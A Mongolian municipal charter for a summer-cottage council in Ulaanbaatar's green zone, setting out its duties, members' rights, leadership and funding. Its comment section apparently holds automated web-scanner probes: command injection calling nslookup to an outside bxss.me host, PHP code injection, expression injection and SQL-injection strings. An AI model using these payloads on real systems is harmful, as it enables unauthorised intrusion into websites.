Зуслангийн зөвлөлийн дүрэм


НИЙСЛЭЛИЙН НОГООН БҮСЭД АЖИЛЛАХ ЗУСЛАНГИЙН ЗӨВЛӨЛИЙН ДҮРЭМ

Нэг. Нийтлэг үндэслэл:

1.1. Нийслэлийн Байгаль Орчны газрын Зуслангийн товчооны дэргэдэх Зуслангийн Зөвлөл нь /цаашид “зөвлөл” гэх/ нийслэлийн ногоон бүсийн зуслан бүхий иргэдийн үйл ажиллагааг зохицуулах, байгаль орчныг хамгаалах нэгж болно.

1.2. Зөвлөлийн оноосон нэр, хаяг: .................................................................

1.3. Зорилго: Зөвлөл нь зуслангийн цаашдын хөгжлийн бодлого, хөтөлбөрийг хэрэгжүүлэх, хөндлөнгийн хяналт тавих, иргэдийн тав тухтай амьдралыг хангахад дэмжлэг үзүүлэх, олон нийтийн эрх ашгийг хамгаалах;

1.4. Үйл ажиллагааны чиглэл: Зуслангийн бүсийн айл өрхийн амьдрах орчны таатай, нөхцөлийг бүрдүүлэх, хог хаягдал, орчны цэвэр цэмцгэр байдалд хяналт тавих, хөршийн холбоо хамгаалалтын найдвартай байдлыг хангахад иргэдийн оролцоог нэмэгдүүлэх, нийтийн эзэмшлийн талбайн орц гарц гаргах;

Хоёр. Зөвлөлийн чиг үүрэг, үйл ажиллагаа:

2.1. Зөвлөл нь Зуслангийн бүсэд үйл ажиллагаа явуулж буй ААН болон иргэд байгаль орчны хууль тогтоомж зөрчсөн үйлдлийг холбогдох байгууллагуудад шуурхай мэдээлж, хууль тогтоомж зөрчихөөс урьдчилан сэргийлэх, иргэдэд анхааруулга сануулга өгөх;

2.2. Зөвлөл нь зуслангийн бүсэд үйл ажиллагаа явуулж буй байгууллагуудаар гадна орчны цэвэрлэгээ хийлгэх, зүлэгжүүлэх, хайс хашааг засаж сэлбүүлэх зэрэг орчны тохижилтын ажилд анхаарал хандуулж шаардлага тавих;

2.3. Зөвлөл нь зуслангийн бүсийн иргэдийг орчны бохирдлыг бууруулах үйл ажиллагаанд татан оролцуулах, хог хаягдлыг нэгдсэн цэгт хаяулах талаар хяналт тавьж ажиллах;

2.4. Зөвлөл нь Зуслангийн айл өрхийн хашааны гадна тал, гудамжийг цэвэр цэмцгэр байлгах, нийтийн эзэмшлийн талбайн ашиглалт хамгаалалтыг зохицуулах, хяналт, шаардлага тавих;

2.5. Зөвлөл нь төрөөс үзүүлж буй үйлчилгээний үнэ хөлс төлөхтэй холбоотойгоор иргэдэд шаардлага тавих;

2.6. Зөвлөл нь иргэдэд тулгамдсан асуудлыг шийдвэрлэх болон холбогдох байгууллагад яаралтай хүргэх зэрэг үйл ажиллагааг зохион байгуулах;

2.7. Нийтийн эзэмшлийн эд хөрөнгө болох гудамжны гэрэлтүүлэг замын тэмдэг тэмдэглэгээ анхааруулга бүхий самбар зэрэг нийтийн эзэмшлийн эд хөрөнгийг хариуцан хамгаалах, ашиглах, аливаа гарсан зөрчлийг арилгуулахаар өмчлөгч, эзэмшигч, ашиглагчдад шаардлага тавих;

2.8. Зөвлөл нь нийтийн эзэмшлийн талбайд хүрэх орц гарцын асуудлыг иргэдийн оролцоотой шийдвэрлэх;

2.9. Зөвлөл нь үйл ажиллагаагаа өргөжүүлэх зорилгоор “Байгаль Орчин Хамгаалах” сантай байж болох бөгөөд сангийн хөрөнгийг зарцуулах үйл ажиллагааг дүрмээр зохицуулж, хөрөнгө төвлөрүүлж ашиглах;

2.10. Зуслангийн бүсэд үйл ажиллагаа явуулж буй ААН байгууллагын үйл ажиллагаа нь зуслангийн айл өрхийн тав тух амгалан байдлыг алдагдуулж, эрүүл ахуйд сөргөөр нөлөөлж байвал холбогдох байгууллагад гомдол гаргаж зохих арга хэмжээ авахуулах;

2.11. Зөвлөл нь Байгаль орчны тухай багц хууль тогтоомж болон ашиглалтын талаарх журам, дүрмийг холбооны гишүүдээр дагаж мөрдүүлэх ажил зохион байгуулж иргэдэд сурталчлах.

2.12. Зөвлөл нь Ногоон бүсийн ашиглалт хамгаалалтын журам болон холбогдох хууль тогтоомжийг иргэдэд сурталчлах, байгаль орчныг хамгаалах, гол горхи, булаг шандыг цэвэр зөв зохистой хэрэглэх, ой хээрийн түймрээс урьдчилан сэргийлэх талаар анхаарч ажиллах

2.13. Зуслангийн нийтийн тээврийн үйлчилгээ, цахилгаан, айл өрхийн унд, ахуйн цэвэр усны талаарх санал хүсэлт, гомдлыг иргэдээс авч товчоонд дамжуулах, шийдвэрлүүлэх, иргэдэд хариуг мэдээлэх;

2.14. Ногоон бүсийн ой мод, газрын хөрсийг эвдэн шинээр зам гаргах, гол горхи булаг шандны усаар тээврийн хэрэгслийг угаах зэрэг байгаль орчныг бохирдуулж буй асуудлуудад хяналт тавьж ажиллах;

2.15. Зөвлөл нь Зуслангийн ерөнхий төлөвлөгөөний дагуу цэвэр, бохир усны хэсэгчилсэн инженерийн шугам сүлжээнд холбогдох ажилд дэмжиж оролцох.

Гурав. Зөвлөлийн гишүүдийн эрх, үүрэг

Зөвлөлийн гишүүд нь дараах эрх хэмжээтэй байна. Үүнд:

а/ Гишүүд болон Удирдах зөвлөлийн гишүүдийг бүх гишүүдийн хурлаар сонгох, чөлөөлөх;

в/ Зөвлөлийн үйл ажиллагааны талаар санал өгөх, гомдол гаргах, эрх ашгаа хамгаалуулах

г/ Аливаа асуудлыг Зуслангийн товчоо, тухайн хэсэг хариуцсан байгаль хамгаалагч болон Зөвлөлийн даргад заавал мэдэгдэх

д/ Төрийн байгууллагуудтай хамтран ажиллах саналаа Зуслангийн товчоогоор уламжлуулан тавьж хамтран ажиллах

е/ Зуслангийн үйл ажиллагаатай холбоотой судалгаа, мэдээллийг зохих байгууллага, иргэн, аж ахуйн нэгжээс Зуслангийн товчоогоор дамжуулан гаргуулан авах;

Дөрөв. Зөвлөлийн бүтэц, эрх үүрэг

4.1. Зөвлөлийн удирдах дээд байгууллага нь Бүх гишүүдийн хурал байх бөгөөд Зуслангийн товчооноос өгсөн чиг үүргийг хэрэгжүүлж, товчоонд 14 хоног тутам ажлаа тайлагнана.

4.2. Бүх гишүүдийн хурлыг энэхүү дүрмийн дагуу зохион байгуулж явуулна. Хурлыг бүх гишүүдийн 70-аас дээш хувийн ирцтэйгээр шийдвэрлэнэ.

4.3. Энэ дүрмийн 4.2.-д заасан хувьд хүрээгүй бол бүх гишүүдийн хурлыг хүчин төгөлдөр бус гэж үзэж, дахин хуралдуулах өдрийг товлоно. Дахин зарласан хурал нь дүрмийн 4.2.-д зааснаар хүчин төгөлдөр болно;

4.3. Байнгын болон улирлын чанартай зуслангийн иргэдээс зуслангийн зөвлөлийн гишүүнчлэлд хамруулж, хурлаар батлах; Зөвлөлд орох иргэнийг нийт гишүүдийн 50-иас доошгүй хувийн ирцтэй хурлаас тус тус сонгож тогтоол гаргана.

4.4. Зөвлөл нь хурлаар хэлэлцсэн асуудал бүрээр олонхийн саналаар шийдвэр /тогтоол/ гаргаж, тэмдэглэл хөтөлнө. Зөвлөлийн хурлын шийдвэр /тогтоол/-д дарга гарын үсэг зурж баталгаажуулна.

4.5. Бүх гишүүдийн хурлын чөлөөт цагт зөвлөлийн өдөр тутмын үйл ажиллагааг зөвлөлөөс сонгосон дарга удирдах бөгөөд дарга нь “Зөвлөлийн дарга нь энэхүү дүрэмд заасны дагуу дараах эрх үүрэгтэй байна. Үүнд:

1. Зөвлөлийн сан байгуулах ажлыг зохион байгуулах хийх ажлын төлөвлөгөө зохиох, орлого, зарлагын төсөв, үйл ажиллагааны болон санхүүгийн тайланг гаргах, удирдах зөвлөлд тайлагнах;

2. Байгаль орчны тухай мөрдөгдөж буй хууль тогтоомж, журмыг зөвлөлийн гишүүдэд сурталчлах, таниулах;

3. Зөвлөлийн ажлыг зохион байгуулж, гүйцэтгэлийг шалгах, шаардлагатай бол урамшуулал олгох;

4. Аливаа хөрөнгө мөнгөтэй холбоотой хийгдэх ажлыг заавал гэрээний үндсэн дээр гүйцэтгүүлэх ба ажлын төсөв гүйцэтгэлийг хяналтын зөвлөлд /Зуслангийн Товчоонд/ танилцуулж, тухай бүрд дүгнэлт гаргуулах;

Тав. Зөвлөлийн удирдах зөвлөл түүний бүтэц, бүрэн эрхийн хугацаа, эрх хэмжээ

5.1. Зөвлөлийн хэвийн үйл ажиллагааг хангах зорилгоор Монгол Улсын Хууль тогтоомжуудыг мөрдлөг болгож ажиллах бөгөөд Газрын тухай хууль, Иргэний хууль, Байгаль хамгаалах тухай багц хууль, Нийслэлийн иргэдийн Төлөөлөгчдийн Хурал, Нийслэлийн засаг даргын бодлого, тогтоол, шийдвэр, захирамж болон энэхүү дүрмийг удирдлага болгон ажиллах бөгөөд дараах эрх хэм хэмжээтэй байна. Үүнд:

а/ Зөвлөлийн даргад нэр дэвших болзол шалгуурыг тогтоох;

б/ Зөвлөлийн даргыг сонгох, бүрэн эрхийн хугацааг тогтоох; Үүнд: Зөвлөлийн даргыг зөвлөлийн гишүүдийн хурлаас нууц санал хураалтаар 1 жилийн хугацаатай сонгоно. Үндсэн үүргээ хангалтгүй биелүүлсэн, өөрөө хүсэлт гаргасан болон хүндэтгэх бусад шалтгаан /эрүүл мэнд, шилжин явах гэх мэт/-аар зөвлөлийн даргыг бүрэн эрхийн хугацаа дуусахаас өмнө чөлөөлж болно.

г/ Зуслангийн өрхийн тоо, газар нутгийн онцлогоос хамааран даргын туслах, бусад гишүүдийн орон тооны хязгаарыг болон зөвлөлийн бүтцийг шийдвэрлэх;

д/ Сонгосон хамт олны санал, зөвлөлийн гишүүний хүсэлтийг үндэслэн зөвлөлийн бүрэлдэхүүнд хугацаанаас өмнө өөрчлөлт оруулж болно.

д/ Зөвлөлд идэвхи санаачлагатай ажилласан гишүүдэд урамшуулал олгох;

е/ Зуслангийн бүсэд үүсэж буй асуудлуудыг зөвлөлийн цаашид хийх ажлын төлөвлөгөөнд гишүүдийн саналыг тусгах.

Зургаа. Холбооны үйл ажиллагаанд шаардлагатай хөрөнгө бүрдүүлэх, сан байгуулж ашиглах

6.1. Шаардлагатай тохиолдолд Зөвлөлийн үйл ажиллагаанд шаардагдах хөрөнгийг бүрдүүлэх, сан байгуулж ашиглах журмыг гишүүдийн хурлаар хэлэлцэн батална.

6.2. Зөвлөлийн үйл ажиллагаанд шаардлагатай хөрөнгийг дараах байдлаар бүрдүүлж болно. Үүнд:

а/ Нийтийн эзэмшлийн эд хөрөнгийн ашиглалт, тохижилт, хамгаалалтад зарцуулах хуримтлал;

б/ Зуслангийн бүсийн ашиглалт, тохижилт, хамгаалалтад зарцуулах хуримтлал;

г/ Зөвлөлийн гишүүдээс өгөх хандив;

д/ бусад орлого.

6.3. Аливаа тохижилт, байгаль орчныг хамгаалалтад зарцуулах хуримтлалыг зөвхөн тухайн зориулалтаар нь зарцуулна.

6.4. Зөвлөлөөс гарсан гишүүнд түүний зөвлөлийн үйл ажиллагаанд зориулсан дээр дурдсан хуримтлал, санд өгсөн мөнгөн хөрөнгө, эд зүйлс, хандивыг буцааж олгохгүй.

Долоо. Хүлээлгэх хариуцлага:

7.1. Зөвлөлийн гишүүд энэхүү дүрмээр хүлээсэн үүргээ биелүүлээгүй хууль дүрэм зөрчсөн тохиолдолд холбогдох хууль тогтоомжийн дагуу хариуцлага хүлээнэ.

Найм. Бусад зүйл:

8.1. Зөвлөл нь энэхүү дүрмийг мөрдлөг болгон ажиллах бөгөөд дүрэмд нэмэлт өөрчлөлт оруулж болно тэдгээр нь энэхүү дүрмийн салшгүй хэсэг болно.

 

 

 

- share

Сэтгэгдэл (36)

  • tpgsjoqy

    1

    2018-07-22
  • klrxfeai

    set|set&set

    2018-07-22
  • klrxfeai

    $(nslookup dns.ce.\045557.24-73.24.6fbf6.\1.bxss.me)

    2018-07-22
  • ektvdupl

    ${9999993+9999963}

    2018-07-22
  • klrxfeai

    &nslookup dns.ce.\045557.24-74.24.6fbf6.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.24-74.24.6fbf6.\1.bxss.me&`'

    2018-07-22
  • ${9999734+9999390}

    1

    2018-07-22
  • xntxfjpy

    )

    2018-07-22
  • xntxfjpy

    !(()&&!|*|*|

    2018-07-22
  • xntxfjpy

    ^(#$!@#$)(()))******

    2018-07-22
  • set|set&set

    1

    2018-07-22
  • $(nslookup dns.ce.\045557.24-79.24.6fbf6.\1.bxss.me)

    1

    2018-07-22
  • &nslookup dns.ce.\045557.24-80.24.6fbf6.\1.bxss.me&'\"`0&nslookup dns.ce.\045557.24-80.24.6fbf6.\1.bxss.me&`'

    1

    2018-07-22
  • )

    1

    2018-07-22
  • !(()&&!|*|*|

    1

    2018-07-22
  • ^(#$!@#$)(()))******

    1

    2018-07-22
  • vgbpbiuq

    ;print(md5(acunetix_wvs_security_test));

    2018-07-22
  • vgbpbiuq

    ';print(md5(acunetix_wvs_security_test));$a='

    2018-07-22
  • vgbpbiuq

    ";print(md5(acunetix_wvs_security_test));$a="

    2018-07-22
  • vgbpbiuq

    ${@print(md5(acunetix_wvs_security_test))}

    2018-07-22
  • vgbpbiuq

    ${@print(md5(acunetix_wvs_security_test))}\

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • buujmrri

    1'"

    2018-07-22
  • buujmrri

    \

    2018-07-22
  • buujmrri

    @@sPu60

    2018-07-22
  • buujmrri

    JyI=

    2018-07-22
  • ;print(md5(acunetix_wvs_security_test));

    1

    2018-07-22
  • ';print(md5(acunetix_wvs_security_test));$a='

    1

    2018-07-22
  • ";print(md5(acunetix_wvs_security_test));$a="

    1

    2018-07-22
  • ${@print(md5(acunetix_wvs_security_test))}

    1

    2018-07-22
  • ${@print(md5(acunetix_wvs_security_test))}\

    1

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • 1'"

    1

    2018-07-22
  • \

    1

    2018-07-22
  • @@IFONY

    1

    2018-07-22
  • JyI=

    1

    2018-07-22
  • buujmrri

    1

    2018-07-22